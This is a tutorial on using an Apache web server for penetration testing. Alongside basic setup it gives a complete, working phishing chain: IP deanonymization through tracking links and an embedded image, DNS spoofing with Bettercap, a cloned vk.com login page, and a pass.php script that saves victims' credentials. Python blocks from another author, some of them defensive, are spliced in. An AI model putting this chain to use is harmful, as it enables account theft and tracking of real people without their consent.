Web server for pentester thing is very necessary


Today the market has many different manufacturers and versions of web servers. Here is a list of some of them:

    • Apache: a free web server, most commonly used on UNIX-like operating systems
    • nginx: a free web server developed by Igor Sysoev, which today rivals Apache in popularity
    • IIS: from Microsoft, distributed with the Windows family of operating systems
    • LiteSpeed Web Server: a proprietary web server developed with a focus on performance
    • Google Web Server: a proprietary web server used in Google's web infrastructure

The servers listed above are the most popular for 2020-2021. All other web servers combined, whose names are counted in tens, are used in less than 1% of web applications.



Defining the web server used in the application under test is a critical task for the tester. Knowing the type and version of the web server will allow the tester to determine if the server has known vulnerabilities and how to exploit them, which in turn can greatly change the testing process.

This information can be obtained by sending specific commands to the web server and analyzing its responses, since different versions of servers may react differently to the same commands. Note that to identify a web server accurately it is usually necessary to send several different commands, because different versions may respond to one command in the same way. It is rare for different versions to respond identically to all HTTP commands, so by sending several different commands the tester can make more accurate assumptions.

Examples of usage:



    • phishing attacks
    • substitution of the original site using DNS spoofing
    • obtaining the target's IP through social engineering
    • hosting scripts for data collection from XSS vulnerabilities
    • gathering data from compromised systems, hosting files for distribution
    • hosting JavaScript and HTML code for embedding in man-in-the-middle and other attacks

 

With a certain skill, a web server can even be turned into a scanner of ports and routers. Understanding at least the basics of a web server is necessary when penetration testing web applications and servers, and this knowledge has even more "peaceful" uses. In this article you will learn about the structure of web server folders and files, setting up subdomains and virtual hosts, web server logs, the basics of PHP and more.

This article focuses on Linux (primarily Kali Linux, Linux Mint, Ubuntu) and also provides links for further study and work in other distributions, as well as for working with a web server on Windows.

Kali Linux

In Kali Linux the web server is installed by default, but it does not start automatically when the computer boots. To start the web server in Kali Linux, run:

sudo systemctl start apache2.service

sudo systemctl start mysql.service

To test the server, open a web browser and go to the localhost page.

Linux Mint, Ubuntu

In these distributions the web server is not installed by default, but it is easy to install with a few commands:

sudo apt-get update

sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql php-xml php-gd php-imap

sudo systemctl enable apache2

sudo systemctl enable mysql.service

Web Server Access

From the computer where the web server is installed, you can always access it by typing localhost or 127.0.0.1 in the browser.

From another computer, you can access the web server in three ways:

  • by local IP (from local network only)
  • by external IP (subject to certain conditions)
  • by domain name (external IP access required + purchased domain + DNS configuration)

To find out the IP address of your computer, type the command:

ip a

As you can see in the screenshot, in my case the IP of the computer is 192.168.0.196. If I type 192.168.0.196 as the site address in a web browser on another computer or phone connected to the same local network, I will reach the web server.

Web server file structure

The file you see when you open http://localhost/ is physically located at /var/www/html/index.html.

You can see for yourself by running the command (it tells the Firefox browser to open the file located in /var/www/html/index.html):

firefox /var/www/html/index.html

Let's add more files and folders to see how the server works. But first let us check who owns the /var/www/html/ directory:

ls -dl /var/www/html/

drwxr-xr-x 2 root root 4096 June 26 18:27 /var/www/html/

This directory belongs to the superuser. Everyone else has the right to read its contents but not to write to it. To make changes in it, we need to either:

    • make the changes as root (use sudo or log in as root), OR
    • make ourselves the owner of this directory

The following command makes the user you are currently logged in as the owner of the directory:

sudo chown -R $USER:$USER /var/www/html

Let’s check it again:

ls -dl /var/www/html/

drwxr-xr-x 2 mial mial 4096 June 26 18:27 /var/www/html/

Now, without elevating privileges, you can open this directory and add, remove or change files in it:

nemo /var/www/html/

Index files

When a web server receives a request for a directory without a file name, it starts looking for index files in that directory. Usually these files include index.html, index.php, index.htm and others (the list is configured in the Apache configuration files).

That is, the address http://localhost/ and the address http://localhost/index.html display the contents of the same file.

Create a test.htm file in the /var/www/html/ folder containing the line "My very first file". You can do this by opening a file manager and going to the folder /var/www/html/, then opening any text editor, typing the line "My very first file" and saving it under the name test.htm.

I will do this from the command line:

echo "My very first file" > /var/www/html/test.htm

This command outputs (echo) the specified string ("My very first file"), redirecting it (>) into the specified file (/var/www/html/test.htm).

So now we have the file /var/www/html/test.htm. If you open http://localhost/test.htm in your web browser you will see a line that was written to the file.

In the directory /var/www/html/ let's create the subdirectory site1:

mkdir /var/www/html/site1

As you can guess, this folder can be accessed by typing http://localhost/site1/ in your web browser.

Since the folder contains no files yet, the listing shown is simply empty.

Let’s create there one more text file:

echo "My second test file" > /var/www/html/site1/test2.htm

Now go to http://localhost/site1/.

And following the link http://localhost/site1/test2.htm we will see the content of this very file, i.e. the line “My second test file”.

There is no index file in /var/www/html/site1/ folder. Let’s create it:

echo "Just Index File" > /var/www/html/site1/index.htm

As you can guess, typing http://localhost/site1/ now shows the index file instead of the file list.

IP Disclosure with social engineering

The file /var/log/apache2/access.log records every request made to the web server, and among this information is the IP address of the requester.

To see the latest entries from this file:

sudo tail /var/log/apache2/access.log

Suppose we have formed the address http://192.168.0.196/site1/test2.htm?p=1112321 and sent it to the person whose IP we want to know.

The URL consists of:

  • http://192.168.0.196 is the address of our server (instead of the IP it could be our domain; it makes no difference)
  • site1/test2.htm is the file that will be shown to the target user
  • ?p=1112321: after the question mark you can pass variable names and their values, but in our example we use a unique string only to make the entry easy to find in the log file

The following will appear in the log file:

192.168.0.244 - - [05/Jul/2017:14:00:06 +0300] "GET /site1/test2.htm?p=1112321 HTTP/1.1" 200 303 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 OPR/46.0.2597.32"

192.168.0.244 - - [05/Jul/2017:14:00:07 +0300] "GET /favicon.ico HTTP/1.1" 404 504 "http://192.168.0.196/site1/test2.htm?p=1112321" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 OPR/46.0.2597.32"

192.168.0.244 - - [05/Jul/2017:14:00:58 +0300] "-" 408 0 "-" "-"

The field /site1/test2.htm?p=1112321 shows which address was requested, and 192.168.0.244 is the IP of the user we want to identify.

Despite its primitive nature, this is quite a working method of deanonymization. The link sent may contain something of interest to the target person (tests, funny pictures, a joke, anything) so that they do not suspect a trick.

Alternatively, instead of searching the logs, you can obtain the IP in a PHP script and immediately send it to the attacker by e-mail.

Here the example is shown on a local network. Everything works exactly the same way on the Internet; you only need an external IP or your own domain name.

If you want to keep your anonymity and someone sends you a "check this out" link (of any kind), you should of course start by changing your IP, or use Tor Browser or any other anonymizer.

A trickier method can be used when the target is not even asked to open a link.

Save any image on your server. For example I upload an image from https://hackware.ru/wp-content/uploads/2017/07/01.jpg and save it to /var/www/html/site1/pic.jpg:

wget -O /var/www/html/site1/pic.jpg https://hackware.ru/wp-content/uploads/2017/07/01.jpg

Consequently, my picture is now available at http://192.168.0.196/site1/pic.jpg.

I, being an “intruder”, create a funny.html file with the following content:

<html>
<head>
<title>Interesting picture</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<div>
<img src="http://192.168.0.196/site1/pic.jpg?tag=4564564544" alt="Enable picture display" />
</div>
</body>
</html>

And I send it to the "victim". The "victim" does not need to visit any site, and the file itself is a simple HTML document opened in a regular web browser; all of this can lower the vigilance of the potential target. The file opens in the browser and simply shows a (not very) funny picture. But since the picture is loaded from the attacker's web server, he will get this entry in his logs:

192.168.0.244 - - [05/Jul/2017:14:28:09 +0300] "GET /site1/pic.jpg?tag=4564564544 HTTP/1.1" 200 387504 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"

Obviously, we inserted the image into the HTML code using the img tag:

<img src="http://192.168.0.196/site1/pic.jpg?tag=4564564544" alt="Enable picture display" />

We could have done without the arbitrary string ?tag=4564564544; it is only needed to make it easier to search the logs and/or to identify the "victim", since I could send one person a file with the string ?tag=4564564544, another ?tag=4564564545, a third ?tag=4564564546, and so on.

Instead of an image, there may be a .js, .css or another file that can be loaded from a remote server without causing suspicion.

Instead of an HTML file it can be an executable or batch file that makes a request to the server, a plain shortcut with a URL, etc.
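Reading access.log by hand works for three lines; for a real log the same analysis is done programmatically. The parser below for Apache's combined log format is an added example (not code from the original article): it extracts the client IP, request path and query parameters from each line and groups client IPs by the marker value (?p= or ?tag=) used in the tracked-link and picture examples above. The sample lines are the article's own log output re-typed as test data; the marker parameter names are an assumption.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_line(line):
    """Parse one combined-format line into a dict; return None if it is not in that format."""
    m = COMBINED_RE.match(line.strip())
    if m is None:
        return None
    entry = m.groupdict()
    # "%r" is "METHOD /path?query HTTP/x.y"; a connection that timed out (408) logs just "-"
    parts = entry["request"].split()
    if len(parts) == 3:
        entry["method"], target, entry["protocol"] = parts
        url = urlsplit(target)
        entry["path"] = url.path
        entry["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    else:
        entry["method"] = entry["protocol"] = entry["path"] = None
        entry["query"] = {}
    return entry


def clients_by_marker(lines, params=("p", "tag")):
    """Map each marker value (the ?p= / ?tag= string) to the set of client IPs that requested it.
    The parameter names are an assumption taken from the article's two examples."""
    seen = defaultdict(set)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for name in params:
            if name in entry["query"]:
                seen[entry["query"][name]].add(entry["ip"])
    return dict(seen)


# Sample input: the four access.log lines shown in the article, re-typed here as test data
SAMPLE_LOG = [
    '192.168.0.244 - - [05/Jul/2017:14:00:06 +0300] "GET /site1/test2.htm?p=1112321 HTTP/1.1" 200 303 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 OPR/46.0.2597.32"',
    '192.168.0.244 - - [05/Jul/2017:14:00:07 +0300] "GET /favicon.ico HTTP/1.1" 404 504 '
    '"http://192.168.0.196/site1/test2.htm?p=1112321" '
    '"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 OPR/46.0.2597.32"',
    '192.168.0.244 - - [05/Jul/2017:14:00:58 +0300] "-" 408 0 "-" "-"',
    '192.168.0.244 - - [05/Jul/2017:14:28:09 +0300] "GET /site1/pic.jpg?tag=4564564544 HTTP/1.1" 200 387504 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36"',
]

if __name__ == "__main__":
    for marker, ips in clients_by_marker(SAMPLE_LOG).items():
        print(marker, "requested from", ", ".join(sorted(ips)))
```

Note that the favicon line carries the marker only in its Referer field, which this grouping deliberately ignores; the timed-out 408 line has no request at all and parses with an empty query.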

Virtual Host Creation

To understand how virtual hosts can be used in pentesting, consider the essence of DNS spoofing, or, as it is often called, substituting DNS responses.

When a user enters the address of a website, for example vk.com, into the address bar of his web browser, a request goes to the DNS server asking "what IP does the site vk.com have?". The DNS server finds the record for vk.com and replies that this site has the IP 95.213.11.181. The user's computer then connects to the web server at 95.213.11.181 asking "please show me the vk.com site". The web server shows the right site, and Pavel Durov (or whoever is there now instead) is happy.

The attacker can spoof the returned DNS response. When performing a man-in-the-middle attack, we can intercept the answer “95.213.11.181” and instead send “victim” the IP of our server, for example 192.168.0.196.

What happens next? The victim's computer connects to our web server with the request "please show me vk.com". And we... we will not upset the user and will show him vk.com, only in our own way.

We will create a directory where the files will be placed (the name of the directory does not matter):

mkdir /var/www/html/vk.com

Let’s create a file in this directory:

echo "VK light" > /var/www/html/vk.com/index.htm

Let’s make a copy of the virtual host configuration file:

sudo cp /etc/apache2/sites-available/000-default.conf /etc/apache2/sites-available/vk.com.conf

Let’s open it for editing:

sudo gedit /etc/apache2/sites-available/vk.com.conf

Without comments, the file looks like this:

<VirtualHost *:80>
    ServerAdmin [email protected]
    DocumentRoot /var/www/html
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

The DocumentRoot directive must be edited to point to the directory where the virtual host files are located (in our case /var/www/html/vk.com). We also need to add the ServerName and ServerAlias directives with the address of our site. The result:

<VirtualHost *:80>
    ServerAdmin [email protected]
    ServerName vk.com
    ServerAlias www.vk.com
    DocumentRoot /var/www/html/vk.com
    ErrorLog ${APACHE_LOG_DIR}/error.log
    CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>

Enable our virtual host:

sudo a2ensite vk.com.conf

Restart the server for the changes to take effect:

sudo systemctl restart apache2

Let’s check the status of the server to make sure that everything works:

systemctl status apache2

Now our server is ready.
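How Apache turns a Host header and a URL path into a file on disk, covering both the index-file behaviour from the "Index files" section and the virtual host just configured, as an added example that is not from the original article: a small model of name-based virtual hosting and DirectoryIndex resolution, run against an in-memory copy of the article's file tree. The DirectoryIndex order is Debian's default from dir.conf and the two-vhost config is reconstructed from the article; both are assumptions.

```python
import re
from posixpath import normpath

# Debian/Kali default from /etc/apache2/mods-enabled/dir.conf (assumed unchanged on the reader's box)
DIRECTORY_INDEX = ("index.html", "index.cgi", "index.pl", "index.php", "index.xhtml", "index.htm")


def parse_vhosts(config_text):
    """ServerName/ServerAlias and DocumentRoot of each <VirtualHost> block, in load order."""
    vhosts = []
    for block in re.findall(r"<VirtualHost[^>]*>(.*?)</VirtualHost>", config_text, re.S):
        vh = {"names": [], "root": None}
        for parts in (line.split() for line in block.splitlines()):
            if parts and parts[0] in ("ServerName", "ServerAlias"):
                vh["names"].extend(p.lower() for p in parts[1:])
            elif parts and parts[0] == "DocumentRoot":
                vh["root"] = parts[1].rstrip("/")
        vhosts.append(vh)
    return vhosts


def select_vhost(vhosts, host_header):
    """Name-based virtual hosting: match Host (port removed) against ServerName/ServerAlias;
    with no match Apache serves the first vhost loaded for that address:port (000-default)."""
    host = host_header.rsplit(":", 1)[0].lower()
    for vh in vhosts:
        if host in vh["names"]:
            return vh
    return vhosts[0]


def resolve(vhosts, host_header, path, entries):
    """What Apache serves for (Host, path); `entries` = existing paths, directories end with "/"."""
    root = select_vhost(vhosts, host_header)["root"]
    fs_path = normpath(root + normpath("/" + path.lstrip("/")))  # ".." collapses inside DocumentRoot
    if fs_path in entries:                       # regular file: served as-is
        return ("file", fs_path)
    if fs_path + "/" in entries:                 # directory
        if not path.endswith("/"):               # mod_dir redirects /site1 to /site1/
            return ("redirect", path + "/")
        for name in DIRECTORY_INDEX:             # first existing index file wins
            if fs_path + "/" + name in entries:
                return ("file", fs_path + "/" + name)
        return ("listing", fs_path)              # no index file: directory listing (if Indexes is on)
    return ("404", None)


# Constructed config: 000-default.conf followed by the vk.com.conf from the article
CONFIG = """<VirtualHost *:80>
    DocumentRoot /var/www/html
</VirtualHost>
<VirtualHost *:80>
    ServerName vk.com
    ServerAlias www.vk.com
    DocumentRoot /var/www/html/vk.com
</VirtualHost>
"""
VHOSTS = parse_vhosts(CONFIG)

# Constructed file tree matching the article's steps (site1 has no index file yet)
ENTRIES = {"/var/www/html/", "/var/www/html/index.html", "/var/www/html/test.htm",
           "/var/www/html/site1/", "/var/www/html/site1/test2.htm",
           "/var/www/html/vk.com/", "/var/www/html/vk.com/index.htm"}
```

Because the default vhost answers for any unknown Host header, a request to the bare IP 192.168.0.196 lands in /var/www/html, while only a Host of vk.com or www.vk.com reaches the cloned site's directory.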

I will show an example of DNS spoofing during a man-in-the-middle attack with Bettercap. If Bettercap is not on your system, install it; the following command is for Kali Linux:

sudo apt-get install bettercap

Let’s create a dns.conf file:

gedit dns.conf

Let’s copy it there:

local .*vk\.com

Launch the attack:

sudo bettercap -X --dns dns.conf

When we try to open the address http://vk.com in a web browser, we see that the DNS response has been successfully spoofed.

By the way, a web server can serve any number of virtual hosts. That is, you can set up mail.ru, yandex.ru, etc. next to vk.com.

And one more "by the way": DNS spoofing does not require a man-in-the-middle attack. It is enough to change the settings of the "victim's" network equipment, specifying your own "correctly" configured DNS server there.

Working with Web Forms

It is amusing to torment unhappy social network users with funny messages, but it is not profitable.

You could, of course, write there that by order of Roskomnadzor № 34539/21-2018 access to vk.com is now paid and to enter the site you need to send 50 rubles to the number 8905143xxxxx... but this is outright criminal, and we will not do it, of course.

We will demonstrate the possibilities of a DNS spoofing attack by trying to find out the user's login and password for VKontakte.

We will make a directory where the site will be cloned:

mkdir websitesmirrors

Note that in the following commands I use the absolute path /home/mial/websitesmirrors/vk.com/ – you need to use your own (/root/websitesmirrors/vk.com/ if you are on Kali Linux).

httrack https://vk.com --headers "Accept-Language: ru-RU,ru;q=0.5" -r2 -F "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" -O "/home/mial/websitesmirrors/vk.com/"

Delete the unnecessary index file:

rm /var/www/html/vk.com/index.htm

Copy files:

cp -r ~/websitesmirrors/vk.com/vk.com/* /var/www/html/vk.com/

We launch a man-in-the-middle attack together with DNS spoofing:

sudo bettercap -X --dns dns.conf

Now the site looks like the original one (although some images seem to be missing – let’s not get into it, for our example it’s insignificant).

But we need to "reconfigure" its form, the one that accepts the login and password and sends them to the login handler.

A typical form looks like this:

<form action="pass.php" method="POST" enctype="multipart/form-data">
Enter username: <input type="text" name="login">
<br />
Enter password: <input type="password" name="password">
<br />
<input type="reset"><input type="submit">
</form>

Here pass.php is the file where the form sends the data.

An example pass.php file:

<?php

$text = "";
foreach ($_POST as $key => $value) {
    $text .= htmlspecialchars($key) . " is " . htmlspecialchars($value) . " \r\n";
}
file_put_contents("pass.txt", $text, FILE_APPEND);

header('Location: http://vk.com/');

This file receives the entered login and password, saves them and redirects the user to the vk.com page (which is pointless, because until the DNS spoofing stops, the user will keep landing on our virtual host).

Of course, this is very primitive PHP code; you would have to add checks for empty variables and so on, but it is enough to get acquainted with the idea.

I counted three forms on the vk.com login page. The one we need looks like this:

<form method="post" name="login" id="index_login_form" action="https://login.vk.com/?act=login">
<input type="hidden" name="act" id="act" value="login">
<input type="hidden" name="role" value="al_frame" />
<input type="hidden" name="expire" id="index_expire_input" value="" />
<input type="hidden" name="_origin" value="index.html" />
<input type="hidden" name="ip_h" value="d483530f9e9e8e6f98" />
<input type="hidden" name="lg_h" value="760276f5a8c4470e8e" />
<input type="text" class="big_text" name="email" id="index_email" value="" placeholder="Phone or e-mail" />
<input type="password" class="big_text" name="pass" id="index_pass" value="" placeholder="password" onkeyup="toggle('index_expire', !this.value);toggle('index_forgot', !this.value)" />
<button id="index_login_button" class="index_login_button flat_button button_big_text">Enter</button>
<div class="forgot">
<div class="checkbox" id="index_expire" onclick="checkbox(this);ge('index_expire_input').value=isChecked(this)?1:'';">Alien computer</div>
<a id="index_forgot" class="index_forgot" href="restore.html" target="_top">Forget password?</a>
</div>
</form>

First, remove all the hidden fields; we get:

<form method="post" name="login" id="index_login_form" action="https://login.vk.com/?act=login">
<input type="text" class="big_text" name="email" id="index_email" value="" placeholder="phone or email" />
<input type="password" class="big_text" name="pass" id="index_pass" value="" placeholder="password" onkeyup="toggle('index_expire', !this.value);toggle('index_forgot', !this.value)" />
<button id="index_login_button" class="index_login_button flat_button button_big_text">Sign in</button>
<div class="forgot">
<div class="checkbox" id="index_expire" onclick="checkbox(this);ge('index_expire_input').value=isChecked(this)?1:'';">Alien computer</div>
<a id="index_forgot" class="index_forgot" href="restore.html" target="_top">Forget password?</a>
</div>
</form>

Change action="https://login.vk.com/?act=login" to action="http://vk.com/pass.php". Also delete name="login" id="index_login_form" so that the page's scripts cannot change the standard behavior of the form:

<form method="post" action="http://vk.com/pass.php">
<input type="text" class="big_text" name="email" id="index_email" value="" placeholder="phone or email" />
<input type="password" class="big_text" name="pass" id="index_pass" value="" placeholder="password" onkeyup="toggle('index_expire', !this.value);toggle('index_forgot', !this.value)" />
<button id="index_login_button" class="index_login_button flat_button button_big_text">Enter</button>
<div class="forgot">
<div class="checkbox" id="index_expire" onclick="checkbox(this);ge('index_expire_input').value=isChecked(this)?1:'';">Alien computer</div>
<a id="index_forgot" class="index_forgot" href="restore.html" target="_top">Forget password?</a>
</div>
</form>

You could also tweak the form so that the browser does not warn about "unsafe input" when data is entered, but it already works and the material is already too long, so we will stop our work with the form at this point.

On the server, we create a pass.php file with the content:

<?php

$text = "";
foreach ($_POST as $key => $value) {
    $text .= htmlspecialchars($key) . " is " . htmlspecialchars($value) . " \r\n";
}
file_put_contents("pass.txt", $text, FILE_APPEND);

header('Location: http://vk.com/');

To avoid problems with writing to the pass.txt file, let’s create it beforehand:

touch /var/www/html/vk.com/pass.txt

And let everyone write to it:

sudo chmod 666 /var/www/html/vk.com/pass.txt

As soon as the user enters his login and password, they will be saved on the attacker’s web server.
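From the defender's side, the change to the form's action above is exactly what a browser's "unsafe input" warning and a phishing-page scanner key on. As an added example that is not from the original article, the following check parses a page's forms and reports every password form that posts over plain http, with GET, or to another site. The sample forms are trimmed copies of the article's original and altered vk.com form, and the same-site rule (one label up or down, no public-suffix list) is a simplifying assumption.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect every <form>: its action, method and whether it holds a password field."""

    def __init__(self):
        super().__init__()
        self.forms, self._form = [], None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "method": a.get("method", "get").lower(),
                          "has_password": False}
        elif tag == "input" and self._form is not None and a.get("type", "").lower() == "password":
            self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def same_site(page_host, target_host):
    """Assumed rule: vk.com and login.vk.com count as one site; anything else is another site."""
    return (target_host == page_host or target_host.endswith("." + page_host)
            or page_host.endswith("." + target_host))


def audit_login_forms(page_url, html):
    """One finding per password form: where it posts and the reasons a browser or scanner would flag it."""
    collector = FormCollector()
    collector.feed(html)
    page_host = urlsplit(page_url).hostname or ""
    findings = []
    for form in collector.forms:
        if not form["has_password"]:
            continue
        target = urlsplit(urljoin(page_url, form["action"]))   # relative actions resolve against the page
        issues = []
        if target.scheme != "https":                     # what the browser's "unsafe input" warning is about
            issues.append("password submitted over plain http")
        if form["method"] != "post":
            issues.append("password sent with GET (ends up in URLs and logs)")
        if not same_site(page_host, target.hostname or ""):
            issues.append("form posts to another site: " + (target.hostname or "?"))
        findings.append({"action": target.geturl(), "issues": issues})
    return findings


# Constructed samples: the real login form as quoted in the article, and the altered copy
ORIGINAL_FORM = ('<form method="post" action="https://login.vk.com/?act=login">'
                 '<input type="text" name="email" /><input type="password" name="pass" />'
                 '<button>Enter</button></form>')
ALTERED_FORM = ORIGINAL_FORM.replace("https://login.vk.com/?act=login", "http://vk.com/pass.php")
```

With DNS spoofed, the altered form posts to the same host name as the page, so the http scheme is the only signal this check has; a second form action pointing at an unrelated host is the other case it flags.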

Conclusion

We have looked (very superficially) at only a few examples of how a web server can help in penetration testing. Further study of the basics of how a web server works and how to configure it will help you better understand and organize attacks.

 
